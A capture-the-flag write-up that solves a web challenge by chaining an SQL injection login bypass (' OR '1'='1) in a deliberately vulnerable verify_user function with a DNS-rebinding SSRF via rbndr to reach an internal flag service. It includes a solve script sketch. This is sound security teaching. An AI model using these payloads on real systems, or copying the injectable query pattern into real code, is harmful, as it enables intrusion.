Portal

My company vibecoded a portal for viewing websites, wonder what can go wrong

Overview

This challenge was created with the AYCEP training materials in mind, and I will walk through it with reference to the relevant sections of those materials.

Initial Analysis

We can first start with analyzing docker-compose.yml, which gives us a high-level overview of the challenge's network.

services:
  mysql:
    image: mariadb:10.11
    env_file: .env
    healthcheck:
      test: ["CMD-SHELL", "mariadb -u$${MYSQL_USER} -p$${MYSQL_PASSWORD} -e 'SELECT 1' || exit 1"]
      interval: 30s
      timeout: 5s
      retries: 10
      start_period: 30s
    networks:
      - backend

  app:
    build: .
    env_file: .env
    ports:
      - "3000:3000"
    dns:
      - 8.8.8.8
    depends_on:
      mysql:
        condition: service_healthy
    networks:
      - backend

networks:
  backend:
    driver: bridge

From this, we notice two services: a front-facing app container and a mysql database. Notably, the mysql service does not expose any ports externally and is only reachable from the internal Docker network. We can take a closer look at the Dockerfile to gain more insight into how the application is initialized.

The final command is particularly interesting: instead of launching a single application, the container starts supervisord, suggesting that multiple processes are managed within the same container.

Looking into supervisord.conf confirms this suspicion. Two separate programs, public and internal, are defined and automatically started when the container comes up.
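Though the config itself isn't reproduced here, a minimal supervisord.conf matching this setup might look like the following; the program names come from the writeup, but the commands and paths are assumptions:

```ini
[supervisord]
nodaemon=true   ; keep supervisord in the foreground as PID 1

[program:public]
command=python /public/app.py     ; externally reachable app on :3000
autostart=true

[program:internal]
command=python /internal/app.py   ; internal flag service on 127.0.0.1:5000
autostart=true
```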

With that, we have identified the three main components of this challenge and can proceed to analyze the source-code.

Source Code Analysis

Like every CTF challenge ever, we want to find where the flag is before analyzing any source code, so we have a goal to work towards. With a quick browse, we see that it's located at /internal/flag.txt and that /internal/app.py serves it.

Directory Structure

Taking a closer look at /internal/app.py, we note that the internal app exposes a /flag endpoint that returns our flag, and that the app runs locally on port 5000.

Knowing that only public is reachable by us, we focus our attention on /public/*.

We start by identifying sources and sinks. Starting with /public/app.py, we identify the following sources.

  • /login

    • request.form['username']

    • request.form['password']

  • /register

    • request.form['username']

    • request.form['password']

  • /dashboard

    • request.form.get('target_url', '')

      • Requires session.get('role') == 'admin'

Now that we have identified all the sources, it's time to identify whether these sources go through any form of transformation/validation.

For /login and /register, user-supplied input is passed to the database helper functions verify_user and add_user respectively, located in db.py.

Reviewing these functions, we observe a difference in how user input is handled. The add_user function uses SQLAlchemy's ORM to create a User object and insert it into the database.

SQLAlchemy's ORM automatically parameterizes queries which is one of the fixes covered that mitigates SQLi.

However, verify_user takes a different approach.

Here, user-controlled input is directly concatenated into a SQL query using string formatting. This makes it vulnerable to SQLi!

This gives us a vulnerable sink from /login to verify_user.
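The vulnerable pattern can be sketched as follows; the exact query text and column names here are assumptions, not the challenge's actual code:

```python
# Hypothetical reconstruction of how verify_user builds its query:
# user input is interpolated straight into the SQL text.
def build_login_query(username, password):
    return (
        "SELECT * FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )

# A quote in the input becomes part of the SQL syntax itself.
print(build_login_query("admin", "x' OR 'a'='a"))
```

Because the quotes in the input are never escaped, the attacker controls the structure of the query, not just its values.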

Let's continue exploring the /dashboard route for now.

Ignoring the admin role check for the time being, we see that it first validates our target_url with validate_host before passing it to fetch_url and displaying the response.

Taking a look at /public/utils.py, we can see the implementation of validate_host and fetch_url in-depth.

At a glance, we see that it performs the following checks:

  1. Checks URL scheme to ensure it is http or https

  2. Performs a DNS lookup with socket.gethostbyname

  3. Enforces an IP blacklist

    1. Loopback - 127.0.0.1

    2. Private IPs - 10.x.x.x, 192.168.x.x, etc.

    3. Reserved Ranges

    4. Link-Local

  4. Returns parsed which is subsequently fetched with requests.get
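The checks above can be reconstructed as a minimal Python sketch, assuming the standard ipaddress module is used for the blacklist; the real implementation may differ:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def validate_host(url):
    parsed = urlparse(url)
    # 1. Only http/https schemes are allowed.
    if parsed.scheme not in ("http", "https"):
        return None
    # 2. Resolve the hostname once, up front.
    try:
        ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
    except (OSError, ValueError, TypeError):
        return None
    # 3. Reject loopback, private, reserved, and link-local addresses.
    if ip.is_loopback or ip.is_private or ip.is_reserved or ip.is_link_local:
        return None
    # 4. Hand the parsed URL back for the subsequent requests.get call.
    return parsed
```

The crucial detail is that the DNS lookup happens once here, while the actual fetch resolves the hostname a second time on its own.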

This seems to prevent SSRF. After all, we cannot trick the DNS lookup into resolving to localhost, right?

This brings us to DNS-Rebinding, a variation of SSRF.

DNS-Rebinding Diagram

Essentially, the main point here is that requests.get performs its own independent DNS resolution.

An attacker can exploit this gap by serving a public IP to pass the initial DNS lookup socket.gethostbyname(host), then rapidly swapping to an internal IP for the request.
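This time-of-check/time-of-use gap can be modeled with a toy resolver that alternates its answers; all names and addresses below are illustrative:

```python
import itertools

class RebindingResolver:
    """Toy stand-in for a rebinding DNS server that alternates answers."""

    def __init__(self, public_ip, internal_ip):
        self._answers = itertools.cycle([public_ip, internal_ip])

    def resolve(self, hostname):
        # A real rebinding service flips answers using very short TTLs;
        # here we simply alternate deterministically.
        return next(self._answers)

resolver = RebindingResolver("203.0.113.10", "127.0.0.1")

# First lookup: validate_host sees a public address and lets it through.
check_ip = resolver.resolve("attacker.example")
# Second lookup: requests.get resolves again and gets the internal one.
fetch_ip = resolver.resolve("attacker.example")
print(check_ip, fetch_ip)
```

The validation and the fetch each believe they are talking about the same host, yet they receive different addresses.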

You can read about the vulnerability in detail over here.

This gives us our last vulnerable sink from /dashboard to fetch_url.

Now, let's combine the pieces for exploitation.

Exploitation

Based on the Dockerfile earlier, we know that it executes init.py, which we now see creates the required tables and adds an admin user to the database.

We can thus craft a SQLi payload with the goal of logging in as admin.

Since the expression '1'='1' always evaluates to TRUE, the WHERE clause becomes TRUE, allowing the query to return a valid row.

The username has to be admin because get_user_by_username uses it to retrieve the user's information later in the function.
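Putting this together, the bypass can be demonstrated end-to-end against an in-memory SQLite database standing in for the challenge's MariaDB; the table and column names are assumptions:

```python
import sqlite3

# In-memory SQLite stands in for the challenge's MariaDB instance.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 'supersecret', 'admin')")

def verify_user(username, password):
    # Vulnerable pattern: input concatenated into the query text.
    query = (
        "SELECT * FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone()

print(verify_user("admin", "guess"))        # no row: wrong password
print(verify_user("admin", "' OR '1'='1"))  # row returned: WHERE is TRUE
```

With the injected password, the query becomes `... AND password = '' OR '1'='1'`, so the admin row comes back despite the wrong password.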

This brings us to /dashboard.

Success!

Now that we are admin, we can use the URL scanner functionality which we previously identified is vulnerable to a DNS-Rebinding attack.

We can use the tool rbndr, which generates a hostname that switches between two IP addresses randomly.

rbndr

We also have to append port 5000 and the /flag path, since we want to reach the internal app's flag endpoint.

Eventually, the DNS resolution swapped at exactly the right moment to bypass the check, allowing us to capture the flag.

Success!

I also automated it with a solve script to make things easier.
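A solve script along these lines might look roughly as follows; the rbndr-style hostname, form field names, and flag format are placeholders rather than the actual script:

```python
import requests

BASE = "http://localhost:3000"  # public app port, per docker-compose
# Hypothetical rbndr-style hostname alternating a public IP and 127.0.0.1.
REBIND_HOST = "08080808.7f000001.rbndr.us"

def solve():
    s = requests.Session()
    # Step 1: SQLi login as admin (form field names assumed).
    s.post(f"{BASE}/login", data={
        "username": "admin",
        "password": "' OR '1'='1",
    })
    # Step 2: retry the SSRF until the resolver flips between the
    # validate_host lookup and the requests.get lookup.
    for _ in range(200):
        r = s.post(f"{BASE}/dashboard", data={
            "target_url": f"http://{REBIND_HOST}:5000/flag",
        })
        if "flag" in r.text:  # placeholder flag format
            return r.text
    return None

# print(solve())  # run against a live instance of the challenge
```

Retrying in a loop matters because the rebinding flip is probabilistic: each attempt only succeeds if the two lookups happen to receive different answers.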

Reflection

With this being the AYCEP Finals, I wanted to give participants a challenge featuring a variation of an attack that was not covered during training.

This writeup demonstrates a more structured process for approaching web CTF challenges. As codebases get larger, having the right approach will save you a lot of time, especially when augmented with LLMs.

Thanks for reading!
